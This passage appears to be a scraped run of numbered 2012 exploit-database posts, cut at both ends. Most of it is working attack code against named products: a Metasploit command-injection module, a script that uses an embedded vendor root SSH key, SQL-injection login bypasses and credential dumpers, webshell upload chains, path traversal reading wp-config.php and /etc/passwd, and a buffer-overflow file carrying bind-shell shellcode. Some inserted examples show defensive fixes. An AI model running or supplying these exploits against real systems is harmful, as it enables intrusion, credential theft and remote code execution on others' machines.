A zero day vulnerability exists in the kernel-mode library ATMFD.DLL, which is used by the OS for working with PostScript-based OpenType font files (.OTF).

Vulnerable versions of Windows/ATMFD.DLL: all, x32 and x64.

Opening a malicious .OTF font file, which can be embedded in a Microsoft Office document or web page, causes a BSoD on NT 5.x (Windows XP, Server 2003) and 100% CPU usage on NT 6.x (Vista, 7, Server 2008).

To trigger the vulnerability -- double click on CFF_Type-1_0x0d_expl.otf

The point of vulnerability -- invalid decoding of the 0x0d byte in a Type 2 Charstring Format glyph, which drops the ATMFD.DLL code into an infinite loop.

"good" glyph representation:

[68]={ 95 112 99 65 61 vhcurveto endchar }

Malicious glyph representation:

[68]={ 95 112 99 65 reserved13 vhcurveto endchar }

This vulnerability was found with the MsFontsFuzz fuzzer, which can be downloaded from https://github.com/Cr4sh/MsFontsFuzz

A more detailed vulnerability analysis can be found at http://blog.cr4.sh/2012/06/0day-windows.html (Russian, use Google Translate).

==== POC ====

http://www.exploit-db.com/sploits/19089.rar

Source: OpenType Font File Format DoS Exploit for Windows
  11. Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",
      'Description'    => %q{
          This module exploits a command injection vulnerability found in Symantec Web
        Gateway's HTTP service due to the insecure usage of the exec() function. This
        module abuses the spywall/ipchange.php file to execute arbitrary OS commands
        without authentication.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tenable Network Security', # Vulnerability Discovery
          'juan vazquez'              # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-0297' ],
          [ 'BID', '53444' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ],
          [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x0d\x0a\x26",
          'Compat'   =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl',
            }
        },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Symantec Web Gateway 5.0.2.8', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 17 2012",
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => '/spywall/login.php'
    })

    if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Close the quoted argument, run the payload, and comment out the rest of the command line
    post_data = "subnet="
    post_data << "\";" + payload.raw + ";#"

    print_status("#{peer} - Sending Command injection")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}spywall/ipchange.php",
      'data'   => post_data
    })

    # If the server doesn't return the default redirection, probably
    # something is wrong
    if not res or res.code != 302 or res.headers['Location'] !~ /SW\/admin_config.php/
      print_error("#{peer} - Probably command not executed, aborting!")
      return
    end
  end

end

Source: Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection
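Added example, not from the module or from Symantec's code: the injection shape the module sends (`subnet="; <payload> ;#`) run against a Python stand-in for ipchange.php's `exec()` call, beside a version that validates the value as a network with the `ipaddress` module and passes it as a single argv element so no shell parses it. `echo` stands in for whatever command the real script runs; the payload here is a harmless `echo` as well.

```python
import ipaddress
import subprocess


def change_ip_vulnerable(subnet):
    """Same pattern as ipchange.php: the POST value is spliced into a shell command
    string. echo stands in for the real reconfiguration command."""
    cmd = 'echo "configuring subnet %s"' % subnet
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def change_ip_fixed(subnet):
    """Validate the value as a network first, then pass it as one argv element so a
    shell never sees it. Raises ValueError for anything that is not a network."""
    net = ipaddress.ip_network(subnet, strict=False)
    out = subprocess.run(["echo", "configuring subnet %s" % net],
                         capture_output=True, text=True)
    return out.stdout


def fixed_rejects(subnet):
    """True when the validating version refuses the value."""
    try:
        change_ip_fixed(subnet)
    except ValueError:
        return True
    return False


# The module's post_data is subnet=";<payload>;# with the payload in the middle.
INJECTED = '"; echo INJECTED; #'

if __name__ == "__main__":
    print(repr(change_ip_vulnerable(INJECTED)))     # second line reads INJECTED
    print(repr(change_ip_fixed("10.0.0.0/24")))
    print("fixed rejects payload:", fixed_rejects(INJECTED))
```

In the vulnerable form the `"` closes the quoted argument, `;` ends the `echo` command, the payload runs as its own command, and `#` comments out the dangling quote; with an argv list there is no command line to reshape, and the type check rejects the value before any process starts.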
  12. F5 BIG-IP Remote Root Authentication Bypass Vulnerability

#!/usr/bin/python
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
# Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
# http://www.secmaniac.com
#
#
import subprocess,os

# write the vendor-shipped private key to disk, then use it to log in as root
filewrite = file("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
filewrite.close()
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
ipaddr=raw_input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()
if os.path.isfile("priv.key"):
    os.remove("priv.key")

Source: F5 BIG-IP Remote Root Authentication Bypass Vulnerability
  13. MySQL Remote Root Authentication Bypass

#!/usr/bin/python
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarrassed to submit this a little.
#
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
# Original advisory here: seclists.org/oss-sec/2012/q2/493
import subprocess

ipaddr = raw_input("Enter the IP address of the mysql server: ")
# keep retrying the same wrong password until the server lets the connection through
while 1:
    subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()

Source: MySQL Remote Root Authentication Bypass
  14. phpAcounts v.0.5.3 SQL Injection

######################################################################################
# Exploit phpAcounts v.0.5.3 SQL Injection
# Date: June 6th 2012
# Author: loneferret
# Version: 0.5.3
# Vendor Url: http://phpaccounts.com/
# Tested on: Ubuntu Server 11.10
######################################################################################
# Discovered by: loneferret
######################################################################################
# Old app, still fun.

Auth. Bypass:
http://<server>/phpaccounts/index.php
Username: x' or '1'='1'#
Password: <whatever>

Upload php shell in preferences
Letterhead image upload does not sanitize file extensions.
http://server/index.php?page=tasks&action=preferences

Access shell:
Where '1' is the user's ID.
http://server/phpaccounts/users/1/<filename>

---- Python PoC ---------

#!/usr/bin/python
import re, mechanize
import urllib, sys

print "\n[*] phpAcounts v.0.5.3 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"

if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <RCMD>"
    exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]

print "[*] Bypassing Login ."
try:
    br = mechanize.Browser()
    br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
    assert br.viewing_html()
    br.select_form(name="loginForm")
    br.select_form(nr=0)
    br.form['Login_Username'] = "x' or '1'#"
    br.form['Login_Password'] = "pwnd"
    print "[*] Triggering SQLi .."
    br.submit()
except:
    print "[*] Oups..Something happened"
    exit(0)

print "[*] Uploading Shell ..."
try:
    br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
    assert br.viewing_html()
    br.select_form(nr=0)
    br.form["Preferences[LETTER_HEADER]"] = 'test'
    br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")
    br.submit(nr=2)
except:
    print "[*] Upload didn't work"
    exit(0)

print "[*] Command Executed\n"
try:
    shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))
    print shell.read()
except:
    print "[*] Oups."
    exit(0)

Source: phpAcounts v.0.5.3 SQL Injection
  15. Wordpress Plugin: Newsletter 1.5 Remote File Disclosure Vulnerability

##################################################
# Description : Wordpress Plugins - Plugin: Newsletter Remote File Disclosure Vulnerability
# Version : 1.5
# Link : http://wordpress.org/extend/plugins/plugin-newsletter/
# Plugins : http://downloads.wordpress.org/plugin/plugin-newsletter.zip
# Date : 31-05-2012
# Google Dork : inurl:/wp-content/plugins/plugin-newsletter/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################

Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php
Read source [CTRL-u]

http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../../../../../etc/passwd
Read source [CTRL-u]

Source: Wordpress Plugin: Newsletter 1.5 Remote File Disclosure Vulnerability
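Added example, not from the plugin or the advisory: the unchecked join that preview.php's `data` parameter implies, beside a resolver that canonicalises the path with `os.path.realpath` and rejects anything that lands outside the plugin directory. The directory tree (`wp-config.php` above a `plugin-newsletter` directory holding `sample.html`) is built in a temporary directory for the demonstration.

```python
import os
import tempfile


def safe_resolve(base_dir, user_path):
    """Absolute path of user_path under base_dir, or None if it resolves outside it.
    realpath() collapses '..' and symlinks; commonpath() avoids the string-prefix
    mistake where /srv/app-old would pass as being inside /srv/app."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def preview_vulnerable(base_dir, data):
    """The behaviour the advisory's URLs imply: join the parameter and open it, no check.
    An absolute user path makes os.path.join discard base_dir entirely."""
    with open(os.path.join(base_dir, data)) as f:
        return f.read()


def preview_fixed(base_dir, data):
    path = safe_resolve(base_dir, data)
    if path is None or not os.path.isfile(path):
        raise PermissionError("refusing %r" % data)
    with open(path) as f:
        return f.read()


def fixed_rejects(base_dir, data):
    """True when the hardened version refuses to serve the path."""
    try:
        preview_fixed(base_dir, data)
    except PermissionError:
        return True
    return False


def build_tree():
    """Constructed layout: a site root holding wp-config.php and the plugin directory."""
    root = tempfile.mkdtemp()
    plugin = os.path.join(root, "wp-content", "plugins", "plugin-newsletter")
    os.makedirs(plugin)
    with open(os.path.join(root, "wp-config.php"), "w") as f:
        f.write("<?php define('DB_PASSWORD', 'secret'); ?>")
    with open(os.path.join(plugin, "sample.html"), "w") as f:
        f.write("<p>newsletter preview</p>")
    return root, plugin


if __name__ == "__main__":
    root, plugin = build_tree()
    traversal = "../../../wp-config.php"   # three levels up from the plugin directory
    print("vulnerable:", preview_vulnerable(plugin, traversal))
    print("fixed     :", "rejected" if fixed_rejects(plugin, traversal) else "served")
    print("fixed     :", preview_fixed(plugin, "sample.html"))
```

The traversal depth in the advisory (`../../../../`) is relative to preview.php's own directory on the real install; the tree above is one level shallower, so three `..` components reach `wp-config.php`.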
  16. Wordpress RBX Gallery Plugin 2.1 Arbitrary File Upload

##################################################
# Description : Wordpress Plugins - RBX Gallery Multiple Arbitrary File Upload Vulnerability
# Version : 2.1
# Link : http://wordpress.org/extend/plugins/rbxgallery/
# Plugins : http://downloads.wordpress.org/plugin/rbxgallery.2.1.zip
# Date : 03-06-2012
# Google Dork : inurl:/wp-content/plugins/rbxgallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################

Exploit :

PostShell.php
<?php

$uploadfile="lo.php";
$uploadfile2="db.php";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/rbxgallery/uploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('images[0]'=>"@$uploadfile",
          'images[1]'=>"@$uploadfile2",
          'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/lo.php
http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/db.php

lo.php
<?php
phpinfo();
?>

Source: Wordpress RBX Gallery Plugin 2.1 Arbitrary File Upload
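Both this post and the phpAccounts letterhead upload in post 14 come down to an upload handler that keeps the client-supplied file name and extension. The following is an added example of an upload handler written to reject those `lo.php` / `backdoor.php` uploads; it is not code from either project. It assumes the same `images[]` field name as the RBX uploader and a destination directory of my choosing.

```php
<?php
// Added example (not RBX Gallery or phpAccounts code): an image upload
// handler that never trusts the client's file name, extension or MIME type.
// Assumptions: files arrive in $_FILES['images'] (array form) and are stored
// under $dest, a directory served as static content only.

function store_image(array $file, string $dest): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Decide the type from the file's bytes, not from $file['name'] or $file['type'].
    $info = getimagesize($file['tmp_name']);
    $allowed = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif'];
    if ($info === false || !isset($allowed[$info[2]])) {
        return null;                       // lo.php / backdoor.php fail here
    }
    // Server-chosen random name with a fixed extension: no .php, no "x.php.jpg" tricks.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
    $path = rtrim($dest, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $path)) {
        return null;
    }
    chmod($path, 0644);                    // readable, never executable
    return $name;
}

$dest = __DIR__ . '/../uploads/rbxslider';   // assumed upload directory
$stored = [];
if (isset($_FILES['images']) && is_array($_FILES['images']['name'])) {
    // PHP exposes array uploads as parallel arrays; regroup them per file.
    foreach ($_FILES['images']['name'] as $i => $_) {
        $one = [];
        foreach (['name', 'type', 'tmp_name', 'error', 'size'] as $k) {
            $one[$k] = $_FILES['images'][$k][$i];
        }
        $saved = store_image($one, $dest);
        $stored[] = $saved ?? 'rejected';
    }
}
header('Content-Type: application/json');
echo json_encode($stored);
```

The handler should be paired with a web-server rule that refuses to execute scripts from the upload directory at all (for Apache, a `<FilesMatch "\.php$">` block with `Require all denied`, or `php_flag engine off`), so that a bypass of the content check still cannot produce remote code execution.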
  17. PHPNet <= 1.8 (ler.php) SQL Injection

<?php
# Exploit Title: PHPNet <= 1.8 (ler.php) SQL Injection
# Exploit Author: WhiteCollarGroup
# Date: 06th 06 2012
# Vendor homepage: http://www.phpnet.com.br/
# Software Link: http://phpbrasil.com/script/Wb03ErMczAho/phpnetartigos
# Google Dork: intext:"Powerd by Nielson Rocha"
# Google Dork: inurl:"ler.php?id=" intext:"Voltar - Imprimir"
# Version: 1.8
# Tested on: Debian GNU/Linux,Windows 7 Ultimate

/*
We discovered multiple vulnerabilities on the system.

~> SQL Injection
This exploit is for a vulnerability in ler.php, but the same vulnerability exists in imprimir.php and imagem.php.
ler.php?id=[SQLi]
imprimir.php?id=[SQLi]
imagem.php?id=[SQLi]
Usage:
php file.php http://server/path/

~> Login bypass
In the login page, you can bypass the login using "SQLi strings".
Go to http://server/path/admin/login.php
Login: ' or 1=1-- wc
Pass: wcgroup

~> Arbitrary File Upload
After opening the administration panel, try to add a new article.
Use the upload form to upload your webshell.
After posting, access:
http://server/path/tmp/your_shell_filename.php

~> Information disclosure
Access:
http://server/path/conf/config.ini

~> XSS Stored (persistent)
When posting a new article, you can post (D)HTML/Javascript codes on the page.
*/

function _printf($str) {
    echo $str."\n";
}

function hex($string){
    $hex=''; // PHP 'Dim' =]
    for ($i=0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    }
    return '0x'.$hex;
}

set_time_limit(0);
error_reporting(E_ERROR & E_USER_WARNING);
@ini_set('default_socket_timeout', 30);

echo "\n";
echo "PHPNet <= 1.8 SQLi Exploit\n";
echo "Discovered by WhiteCollarGroup\n";
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com";

if($argc!=2) {
    _printf("Usage:");
    _printf("php $argv[0] <target>");
    _printf("Example:");
    _printf("php $argv[0] http://site.com/path/");
    exit;
}

$target = $argv[1];
if(substr($target, (strlen($target)-1))!="/") { // if the last character is not a slash
    $target .= "/";
}
$inject = $target . "ler.php?id=-0'%20";
$token = uniqid();
$token_hex = hex($token);

// now fetch the following data: user() version()
echo "\n\n[*] Trying to get informations...\n";
$infos = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",version(),".$token_hex.",user(),".$token_hex."),6,7,8-- "));
$infos_r = array();
preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r);
// concat() above emits version() first and user() second
$version = $infos_r[1][0];
$user = $infos_r[2][0];
if(($user) AND ($version)) {
    echo "[!] MySQL user: $user\n";
    echo "[!] MySQL version: $version\n";
} else {
    echo "[-] Error while getting informations...\n";
}

$i = 0;
while(1==1) {
    $dados_r = array();
    $dados = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",admin_user,".$token_hex.",admin_pass,".$token_hex."),6,7,8 from pna_admin limit $i,1-- "));
    preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r);
    $login = $dados_r[1][0];
    $senha = $dados_r[2][0];
    if(($login) AND ($senha)) {
        echo " -+-\n";
        echo "[!] User: $login\n";
        echo "[!] Pass: $senha\n";
        $i++;
    } else {
        break; // exitloop
    }
}

// evaluated once the loop has ended (the original placed this inside the loop,
// where the failure message could never be reached)
if($i==0) {
    echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry.";
} else {
    echo " -+-\n[!] :D";
}
echo "\n";
?>

Source: PHPNet <= 1.8 (ler.php) SQL Injection
  18. SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection

##############################################################################
## SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability
## Google Dork: "snews/visualiza.php?id="
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Date: 06/06/2012
## Version: 1.2
## Software Link: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news
## ISRAEL
##############################################################################
## Author will not be responsible for any damage.
##############################################################################
## Vulnerable Code - /admin/logar.php [4-15]:

4.$login = $_POST["login"];
5.$senha = $_POST["senha"];
6.$sql = "select * from news_adm where login='$login' AND senha='$senha'";
7.$query = mysql_query($sql);
8.$nr = mysql_num_rows($query);
9.if($nr>0){
10.$_SESSION["admin"] = "on";
11.echo "<script>
12.location.href='../'
13.</script>
14.";
15.}

## NOTE:
## As you can see there is no validation or any filter to variables $login and $senha.
## See line 6, so you can inject sql query by using $login and $senha variables.

## SQL Injection PoC:
## http://127.0.0.1/sn_news/admin/login.htm
## Login: ' or '1'='1
## Senha: ' or '1'='1
## This injection will bypass the admin login screen.
##############################################################################
# Cya
# 0x31337.net
##############################################################################

Source: SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection
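Line 6 above is the same pattern behind the login bypasses in posts 14 and 17: user input is interpolated into the SQL text, so a quote in `$login` rewrites the query. The following is an added example of the `/admin/logar.php` logic rewritten with a prepared statement and hashed passwords; it is not SN News code. It assumes a mysqli connection (placeholder credentials) and that the `senha` column holds `password_hash()` output rather than plaintext.

```php
<?php
// Added example (not SN News code): the logar.php logic from the advisory with
// the query parameterised, so $login and $senha are data, never SQL.
// Assumptions: mysqli connection $db (placeholder credentials below) and a
// news_adm table whose senha column stores password_hash() output.

function admin_login(mysqli $db, string $login, string $senha): bool
{
    // Vulnerable original (line 6):
    //   "select * from news_adm where login='$login' AND senha='$senha'"
    // Here the value is bound as a parameter: "' or '1'='1" is compared as a
    // literal login name and matches nothing.
    $stmt = $db->prepare('SELECT senha FROM news_adm WHERE login = ? LIMIT 1');
    $stmt->bind_param('s', $login);
    $stmt->execute();
    $stmt->bind_result($storedHash);
    $found = ($stmt->fetch() === true);
    $stmt->close();

    // Verify against a throwaway hash when the user is unknown, so the response
    // time does not reveal which login names exist.
    $hash = $found ? $storedHash : password_hash('', PASSWORD_DEFAULT);
    return password_verify($senha, $hash) && $found;
}

session_start();
$db = new mysqli('localhost', 'snnews', 'PLACEHOLDER_PASSWORD', 'snnews'); // placeholder

$login = $_POST['login'] ?? '';
$senha = $_POST['senha'] ?? '';

if (admin_login($db, $login, $senha)) {
    session_regenerate_id(true);   // new session id on privilege change
    $_SESSION['admin'] = 'on';
    header('Location: ../');
    exit;
}
http_response_code(401);
echo 'Login failed';
```

The bound parameter is what closes the injection; the hashing and constant-time behaviour are the other two properties a login handler should have, and they are cheap to add while the code is being touched.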
  19. Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit

#!/usr/bin/python -w
#------------------------------------------------------------------------------------#
# Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions)            #
# CVE: CVE-2012-2915                                                                  #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/                         #
# OS: WinXP SP1                                                                       #
# Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm  #
#------------------------------------------------------------------------------------#
# I didn't dig too deep but it seems portability to other OS builds is not promising  #
# due to SafeSEH and badchars in the application modules.                             #
#------------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.130 9988                                              #
# (UNKNOWN) [192.168.111.130] 9988 (?) open                                           #
# Microsoft Windows XP [Version 5.1.2600]                                             #
# (C) Copyright 1985-2001 Microsoft Corp.                                             #
#                                                                                     #
# C:\Documents and Settings\Owner\Desktop>                                            #
#------------------------------------------------------------------------------------#

filename="evil.PAC"

PAC1 = """<?xml version="1.0"?>
<PacDesignData>
<DocFmtVersion>1</DocFmtVersion>
<DeviceType>ispPAC-CLK5410D</DeviceType>
<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
<SummaryInformation>
<Title>Oops..</Title>
<Author>b33f</Author>
</SummaryInformation>
<SymbolicSchematicData>
<Symbol>
<SymKey>153</SymKey>
<NameText>Profile 0 Ref Frequency</NameText>
<Value>"""

#------------------------------------------------------------------------------------#
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c   #
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)                           #
#------------------------------------------------------------------------------------#
shellcode = (
"\x89\xe3\xd9\xd0\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x79\x6c\x59\x78\x4e\x69\x35\x50\x35\x50\x57\x70\x53\x50\x6b"
"\x39\x6a\x45\x35\x61\x38\x52\x73\x54\x4c\x4b\x36\x32\x70\x30"
"\x4e\x6b\x56\x32\x36\x6c\x6e\x6b\x72\x72\x32\x34\x6e\x6b\x33"
"\x42\x66\x48\x56\x6f\x38\x37\x61\x5a\x45\x76\x56\x51\x59\x6f"
"\x45\x61\x59\x50\x6e\x4c\x67\x4c\x73\x51\x73\x4c\x74\x42\x46"
"\x4c\x45\x70\x4b\x71\x58\x4f\x54\x4d\x63\x31\x69\x57\x78\x62"
"\x7a\x50\x46\x32\x63\x67\x6e\x6b\x70\x52\x66\x70\x4e\x6b\x30"
"\x42\x47\x4c\x76\x61\x6e\x30\x4e\x6b\x57\x30\x73\x48\x4b\x35"
"\x69\x50\x72\x54\x53\x7a\x75\x51\x6e\x30\x36\x30\x6e\x6b\x72"
"\x68\x55\x48\x6e\x6b\x30\x58\x31\x30\x65\x51\x5a\x73\x7a\x43"
"\x75\x6c\x72\x69\x6c\x4b\x64\x74\x4c\x4b\x45\x51\x6a\x76\x74"
"\x71\x79\x6f\x76\x51\x4f\x30\x6c\x6c\x69\x51\x6a\x6f\x64\x4d"
"\x35\x51\x69\x57\x45\x68\x4d\x30\x74\x35\x6b\x44\x75\x53\x73"
"\x4d\x49\x68\x67\x4b\x61\x6d\x45\x74\x30\x75\x69\x72\x32\x78"
"\x4c\x4b\x51\x48\x36\x44\x55\x51\x38\x53\x51\x76\x6c\x4b\x66"
"\x6c\x42\x6b\x6c\x4b\x66\x38\x37\x6c\x66\x61\x38\x53\x4e\x6b"
"\x63\x34\x6c\x4b\x67\x71\x48\x50\x6d\x59\x72\x64\x56\x44\x74"
"\x64\x33\x6b\x31\x4b\x53\x51\x66\x39\x62\x7a\x72\x71\x59\x6f"
"\x4b\x50\x33\x68\x31\x4f\x62\x7a\x4c\x4b\x35\x42\x4a\x4b\x6d"
"\x56\x31\x4d\x42\x48\x36\x53\x30\x32\x57\x70\x33\x30\x42\x48"
"\x71\x67\x52\x53\x57\x42\x43\x6f\x71\x44\x42\x48\x50\x4c\x43"
"\x47\x71\x36\x53\x37\x79\x6f\x58\x55\x58\x38\x6a\x30\x56\x61"
"\x65\x50\x73\x30\x76\x49\x6a\x64\x43\x64\x30\x50\x52\x48\x47"
"\x59\x4d\x50\x30\x6b\x57\x70\x39\x6f\x6e\x35\x72\x70\x76\x30"
"\x52\x70\x36\x30\x31\x50\x36\x30\x43\x70\x76\x30\x32\x48\x69"
"\x7a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x79\x45\x6e\x69\x4a\x67"
"\x34\x71\x49\x4b\x62\x73\x43\x58\x63\x32\x77\x70\x56\x47\x76"
"\x64\x6d\x59\x79\x76\x32\x4a\x56\x70\x32\x76\x61\x47\x63\x58"
"\x38\x42\x4b\x6b\x67\x47\x53\x57\x59\x6f\x4e\x35\x31\x43\x76"
"\x37\x33\x58\x48\x37\x69\x79\x35\x68\x69\x6f\x79\x6f\x6e\x35"
"\x30\x53\x31\x43\x63\x67\x35\x38\x51\x64\x38\x6c\x75\x6b\x49"
"\x71\x59\x6f\x79\x45\x43\x67\x6c\x49\x5a\x67\x42\x48\x52\x55"
"\x30\x6e\x70\x4d\x61\x71\x79\x6f\x58\x55\x32\x48\x33\x53\x30"
"\x6d\x33\x54\x43\x30\x4e\x69\x49\x73\x56\x37\x33\x67\x62\x77"
"\x54\x71\x59\x66\x71\x7a\x57\x62\x32\x79\x36\x36\x38\x62\x6b"
"\x4d\x61\x76\x58\x47\x51\x54\x74\x64\x57\x4c\x75\x51\x55\x51"
"\x6e\x6d\x77\x34\x46\x44\x44\x50\x68\x46\x37\x70\x50\x44\x31"
"\x44\x76\x30\x72\x76\x61\x46\x72\x76\x50\x46\x43\x66\x72\x6e"
"\x31\x46\x76\x36\x71\x43\x30\x56\x33\x58\x43\x49\x38\x4c\x47"
"\x4f\x6c\x46\x59\x6f\x6b\x65\x4f\x79\x79\x70\x32\x6e\x32\x76"
"\x57\x36\x39\x6f\x70\x30\x43\x58\x45\x58\x4b\x37\x35\x4d\x73"
"\x50\x79\x6f\x6e\x35\x4d\x6b\x6c\x30\x6c\x75\x79\x32\x73\x66"
"\x62\x48\x6f\x56\x4c\x55\x4d\x6d\x6d\x4d\x39\x6f\x6a\x75\x65"
"\x6c\x47\x76\x73\x4c\x64\x4a\x6d\x50\x79\x6b\x49\x70\x33\x45"
"\x54\x45\x4f\x4b\x63\x77\x47\x63\x33\x42\x72\x4f\x51\x7a\x37"
"\x70\x30\x53\x79\x6f\x68\x55\x41\x41")

#------------------------------------------------------------------------------------#
# SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll                             #
# nSEH: \xEB\x05                                                                      #
#------------------------------------------------------------------------------------#
b00m = "\x90"*20 + shellcode
payload = "A"*98 + "\xEB\x05\x79\x28\x51\x77" + b00m + "C"*(5000-len(b00m))

PAC2 = """</Value>
</Symbol>
</SymbolicSchematicData>
</PacDesignData>"""

buffer = PAC1 + payload + PAC2

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

Source: Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit
  20. Browser Navigation Download Trick

Another moderately interesting tidbit, I guess...

